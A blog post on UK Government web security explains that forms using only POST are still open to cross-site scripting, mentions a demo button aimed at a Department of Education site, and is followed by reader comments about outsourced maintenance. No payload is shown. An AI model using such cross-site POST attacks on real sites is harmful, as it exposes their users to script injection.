This is part 2 of a series of blog posts looking at the security of the UK Government’s web infrastructure.
Many XSS flaws rely on altering the GET parameters of a request. Some webmasters seem to think that if their forms only use POST they will be immune from the XSS. This is not the case.
Don’t Press This Button
Pressing this button will send a POST request to the Department of Education’s EduBase website.
I think you’ve over-stated the outsourcing element. Lack of escalation process and/or ownership (and problems responding to emergencies) isn’t unique to outsourced systems and the result is the same regardless.
It can certainly be a problem with internal teams. But I’ve never seen an outsourced team which has the same level of access to decision making members of staff in the “parent” organisation.
Additionally, outsourced partners are – in my experience – much more concerned about hitting contractual metrics rather than solving problems. Sometimes that works – often it doesn’t.
‘Solving problems’ is a pretty good contractual metric, but it may also be that the customer here just doesn’t think it’s a good cost / benefit to pay for greater agility*.
* Guessing, I have no knowledge of this site or supplier.